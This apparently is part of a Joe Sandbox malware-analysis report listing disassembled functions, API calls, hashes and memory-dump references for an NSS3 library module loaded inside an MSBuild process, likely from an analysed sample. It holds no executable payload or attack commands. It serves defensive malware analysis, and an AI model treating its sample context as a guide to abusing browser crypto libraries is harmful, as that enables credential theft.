Function 6C712CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C715B40: PR_GetIdentitiesLayer.NSS3 ref: 6C715B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C712CEC

Part of subcall function 6C72C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C72C2BF

PR_EnterMonitor.NSS3(?), ref: 6C712D02
PR_EnterMonitor.NSS3(?), ref: 6C712D1F
PR_ExitMonitor.NSS3(?), ref: 6C712D42
PR_ExitMonitor.NSS3(?), ref: 6C712D5B

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: f09ce48c543e49759768657eab3b1642f3ec725ba2d085dec809e432085e8d27
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: A90148B19542005BE7308F29FE09BC7B3A5EF52318F084435E89986F22D632F4148792

Function 6C712D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C715B40: PR_GetIdentitiesLayer.NSS3 ref: 6C715B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C712D9C

Part of subcall function 6C72C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C72C2BF

PR_EnterMonitor.NSS3(?), ref: 6C712DB2
PR_EnterMonitor.NSS3(?), ref: 6C712DCF
PR_ExitMonitor.NSS3(?), ref: 6C712DF2
PR_ExitMonitor.NSS3(?), ref: 6C712E0B

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction ID: 47cb7a6e13ed3090ab38021ee0d043e182b8adea3d702186988b1f56fa08025c
Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction Fuzzy Hash: 7801C8B1A542045FE7309E29FE0DBC7B7A5EF52318F084435E89986F12D632F5198693

Function 6C79ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6C79A6D8), ref: 6C79AE0D
free.MOZGLUE(?), ref: 6C79AE14
DeleteCriticalSection.KERNEL32(6C79A6D8), ref: 6C79AE36
free.MOZGLUE(?), ref: 6C79AE3D
free.MOZGLUE(00000000,00000000,?,?,6C79A6D8), ref: 6C79AE47

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: 541c48870d85b2f597e4cecfc3e9226c14aa73a6b816b777a1f1a0159d9cf4eb
Instruction ID: 2f853ee31119b62a16cc2b86d265f32e23fdbfaffea6f2e6a284ad66a51569e6
Opcode Fuzzy Hash: 541c48870d85b2f597e4cecfc3e9226c14aa73a6b816b777a1f1a0159d9cf4eb
Instruction Fuzzy Hash: 66F0F675601A01A7CA009F68E809917777CBF86776B10037CE52A83940D731F011C7D1

Function 6C616C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C616D36

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C616D20
%s at line %d of [%.10s], xrefs: 6C616D2F
database corruption, xrefs: 6C616D2A

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 3591a16d9418a1122940482016e6d3e3631824e450ca1b1f5b63bd351110f4ac
Instruction ID: b79a5e4eebee7b2addaa67aa8477fba75f9a275f210a0f511392c787f2f67eb7
Opcode Fuzzy Hash: 3591a16d9418a1122940482016e6d3e3631824e450ca1b1f5b63bd351110f4ac
Instruction Fuzzy Hash: 65210235A183059BC7148E19C941B9AB7F2EF81309F14852CD849DBF51E770F9488B9A

Function 6C74CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6C74CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C74CC7B), ref: 6C74CD7A
Part of subcall function 6C74CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C74CD8E
Part of subcall function 6C74CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C74CDA5
Part of subcall function 6C74CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C74CDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C74CCB5
memcpy.VCRUNTIME140(6C7E14F4,6C7E02AC,00000090), ref: 6C74CCD3
memcpy.VCRUNTIME140(6C7E1588,6C7E02AC,00000090), ref: 6C74CD2B

Part of subcall function 6C669AC0: socket.WSOCK32(?,00000017,6C6699BE), ref: 6C669AE6
Part of subcall function 6C669AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C6699BE), ref: 6C669AFC

Part of subcall function 6C670590: closesocket.WSOCK32(6C669A8F,?,?,6C669A8F,00000000), ref: 6C670597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6C74CCB0

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: 2de7e68267e7a792c02033b71a4e56d769e61a1b5bbd94a415f2be7806b2019b
Instruction ID: 3bcf0d088abaf35cbdb54527c5b19bdbe7fc9850e6a007e8a9399d2e18e41fea
Opcode Fuzzy Hash: 2de7e68267e7a792c02033b71a4e56d769e61a1b5bbd94a415f2be7806b2019b
Instruction Fuzzy Hash: B71193F3B012409FDB809F6AAA4BB563AB8934F218F145439E41ACBB53E771C444CBD6

Function 6C798530 Relevance: 6.1, APIs: 4, Instructions: 127threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C7E14E4,6C74CC70), ref: 6C798569
gethostbyaddr.WSOCK32(?,00000004,00000002), ref: 6C7985AD
GetLastError.KERNEL32(?,00000004,00000002), ref: 6C7985B6
PR_GetCurrentThread.NSS3(?,00000004,00000002), ref: 6C7985C6

Part of subcall function 6C670F00: PR_GetPageSize.NSS3(6C670936,FFFFE8AE,?,6C6016B7,00000000,?,6C670936,00000000,?,6C60204A), ref: 6C670F1B
Part of subcall function 6C670F00: PR_NewLogModule.NSS3(clock,6C670936,FFFFE8AE,?,6C6016B7,00000000,?,6C670936,00000000,?,6C60204A), ref: 6C670F25

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: CallCurrentErrorLastModuleOncePageSizeThreadgethostbyaddr
String ID:
API String ID: 4254312643-0
Opcode ID: 3ddd1d396dc41aebdcc30267735d8d170ab8e0cb83a8657d4325234e0ae06693
Instruction ID: 673417687466e779935b9e7bab5c5d4cd99757a6b0fcfc31c65bf863e800fb97
Opcode Fuzzy Hash: 3ddd1d396dc41aebdcc30267735d8d170ab8e0cb83a8657d4325234e0ae06693
Instruction Fuzzy Hash: E44117B0A0830AAFE7148A36EA45755B7B4EB4532CF08473BC92587EC2D7749D88CBD1

Function 6C6D0420 Relevance: 6.1, APIs: 4, Instructions: 117memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000000,?,6C6BC97F,?,?,?), ref: 6C6D04BF
TlsGetValue.KERNEL32(00000000,?,6C6BC97F,?,?,?), ref: 6C6D04F4
EnterCriticalSection.KERNEL32(?,?,?,6C6BC97F,?,?,?), ref: 6C6D050D
PR_Unlock.NSS3(?,?,?,?,6C6BC97F,?,?,?), ref: 6C6D0556

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Alloc_CriticalEnterSectionUnlockUtilValue
String ID:
API String ID: 349578545-0
Opcode ID: ceae44856b1ec7a770b8fe908dc9742e055f2240bac9a2776d8c0c455bc7c273
Instruction ID: c14347d798cec434ea91734d32988865d5bb4761e6cb61b66e2baed846922311
Opcode Fuzzy Hash: ceae44856b1ec7a770b8fe908dc9742e055f2240bac9a2776d8c0c455bc7c273
Instruction Fuzzy Hash: FE4158B4A11642CFDB04DF29C584669BBF0BF48318F26856DDC998BB11EB30F891CB84

Function 6C6F2C80 Relevance: 6.1, APIs: 4, Instructions: 105COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,?,6C6F1289,?), ref: 6C6F2D72

Part of subcall function 6C6F3390: PORT_ZAlloc_Util.NSS3(00000000,-0000002C,?,6C6F2CA7,E80C76FF,?,6C6F1289,?), ref: 6C6F33E9
Part of subcall function 6C6F3390: PORT_ZAlloc_Util.NSS3(0000001C), ref: 6C6F342E

PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6F1289,?), ref: 6C6F2D61

Part of subcall function 6C6F0B00: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6F0B21
Part of subcall function 6C6F0B00: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6F0B64

PR_SetError.NSS3(FFFFE02D,00000000,?,?,?,?,6C6F1289,?), ref: 6C6F2D88
PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6C6F1289,?), ref: 6C6F2DAF

Part of subcall function 6C6AB8F0: PR_CallOnceWithArg.NSS3(6C7E2178,6C6ABCF0,?), ref: 6C6AB915
Part of subcall function 6C6AB8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000001,?), ref: 6C6AB933
Part of subcall function 6C6AB8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,?), ref: 6C6AB9C8
Part of subcall function 6C6AB8F0: SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6C6AB9E1

Part of subcall function 6C6F0A50: SECOID_GetAlgorithmTag_Util.NSS3(6C6F2A90,E8571076,?,6C6F2A7C,6C6F21F1,?,?,?,00000000,00000000,?,?,6C6F21DD,00000000), ref: 6C6F0A66

Part of subcall function 6C6F3310: SECOID_GetAlgorithmTag_Util.NSS3(?,00000000,FFFFFFFF,?,6C6F2D1E,?,?,?,?,00000000,?,?,?,?,?,6C6F1289), ref: 6C6F3348

Part of subcall function 6C6F06F0: PORT_ZAlloc_Util.NSS3(0000000C,00000000,?,6C6F2E70,00000000), ref: 6C6F0701

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Util$AlgorithmAlloc_ErrorK11_Tag_$Item_Tokens$AllocCallFreeOnceWithZfree
String ID:
API String ID: 2288138528-0
Opcode ID: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
Instruction ID: 8e2da28fe65aa1e5a1a51fa4424b1d3be6d1a1625c541a4001d6894dc2caf130
Opcode Fuzzy Hash: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
Instruction Fuzzy Hash: 4A31ECB69002456BDB009E64DC44A9A37AABF4631DF140130ED245B796F731E92ACBBA

Function 6C686C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C686C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C686CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C686CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C7A8FE0), ref: 6C686CFE

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: 14cc699a4213948a44442e99d4e271eb9eb346c5a9e2d08d8a4e879c4aa279e1
Instruction ID: 946ec0e014d1ac349b3aa923b32c18b9cb19dc5612b9d34e7aa8e89c538617cb
Opcode Fuzzy Hash: 14cc699a4213948a44442e99d4e271eb9eb346c5a9e2d08d8a4e879c4aa279e1
Instruction Fuzzy Hash: F0317CB1A022169BEB08DF65C891ABFBBF5EF49248B10442DD905EB740EB31D905CBA4

Function 6C6E8530 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,?,6C6E72EC), ref: 6C6E855A

Part of subcall function 6C6E07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C688298,?,?,?,6C67FCE5,?), ref: 6C6E07BF
Part of subcall function 6C6E07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C6E07E6
Part of subcall function 6C6E07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6E081B
Part of subcall function 6C6E07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6E0825

PORT_ArenaGrow_Util.NSS3(?,00000000,?,00000001,?,?,6C6E72EC), ref: 6C6E859E
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6C6E72EC), ref: 6C6E85B8
PR_SetError.NSS3(FFFFE005,00000000,?,6C6E72EC), ref: 6C6E8600

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: ErrorUtil$ArenaHashLookupTable$Alloc_ConstFindGrow_
String ID:
API String ID: 1727503455-0
Opcode ID: c3976de85504193724a61ee596be12a747b852d478c2b9224f3d669c07c31240
Instruction ID: ceb29f521e66f56d14f38c46de5df2252ae886c4a80765d5b100e187f2fa680b
Opcode Fuzzy Hash: c3976de85504193724a61ee596be12a747b852d478c2b9224f3d669c07c31240
Instruction Fuzzy Hash: 66213831A062014BE7408F2DDC40B6B72A9AF8D31CF65412BD855D77A0EF31D805C799

Function 6C6704D0 Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?), ref: 6C6704F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C67053B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C670558
GetLastError.KERNEL32 ref: 6C67057A

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorFileHandleInformationLast
String ID:
API String ID: 3051374878-0
Opcode ID: fc013631943d9a5fe1ab7b9833bb3becdf39dc5b0a8457adc4265cdc8411f081
Instruction ID: 49d74535437738a3bae7a46422804c4819ff81b6b43f0b69d05b2722fff8c5d8
Opcode Fuzzy Hash: fc013631943d9a5fe1ab7b9833bb3becdf39dc5b0a8457adc4265cdc8411f081
Instruction Fuzzy Hash: F6216271B002189FDB08DF68DD98A9EB7B8FF49308B108129E809DB351D731ED05CBA0

Function 6C6F2DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C6F2E08

Part of subcall function 6C6E14C0: TlsGetValue.KERNEL32 ref: 6C6E14E0
Part of subcall function 6C6E14C0: EnterCriticalSection.KERNEL32 ref: 6C6E14F5
Part of subcall function 6C6E14C0: PR_Unlock.NSS3 ref: 6C6E150D

PORT_NewArena_Util.NSS3(00000400), ref: 6C6F2E1C
PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C6F2E3B
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6F2E95

Part of subcall function 6C6E1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C6888A4,00000000,00000000), ref: 6C6E1228
Part of subcall function 6C6E1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C6E1238
Part of subcall function 6C6E1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C6888A4,00000000,00000000), ref: 6C6E124B
Part of subcall function 6C6E1200: PR_CallOnce.NSS3(6C7E2AA4,6C6E12D0,00000000,00000000,00000000,?,6C6888A4,00000000,00000000), ref: 6C6E125D
Part of subcall function 6C6E1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C6E126F
Part of subcall function 6C6E1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C6E1280
Part of subcall function 6C6E1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C6E128E
Part of subcall function 6C6E1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C6E129A
Part of subcall function 6C6E1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C6E12A1

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
String ID:
API String ID: 1441289343-0
Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction ID: 24cfae1e91e605b96fa02d5850de40353ccc0cb371ff3e698b0162e7bbe16999
Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction Fuzzy Hash: 122168B1D053804BE700CF509C44BAA3765AF9630CF210269DD285B702F7B1E69AC7AA

Function 6C6AACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C6AACC2

Part of subcall function 6C682F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C682F0A
Part of subcall function 6C682F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C682F1D

Part of subcall function 6C682AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C680A1B,00000000), ref: 6C682AF0
Part of subcall function 6C682AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C682B11

CERT_DestroyCertList.NSS3(00000000), ref: 6C6AAD5E

Part of subcall function 6C6C57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C68B41E,00000000,00000000,?,00000000,?,6C68B41E,00000000,00000000,00000001,?), ref: 6C6C57E0
Part of subcall function 6C6C57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C6C5843

CERT_DestroyCertList.NSS3(?), ref: 6C6AAD36

Part of subcall function 6C682F50: CERT_DestroyCertificate.NSS3(?), ref: 6C682F65
Part of subcall function 6C682F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C682F83

free.MOZGLUE(?), ref: 6C6AAD4F

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID:
API String ID: 132756963-0
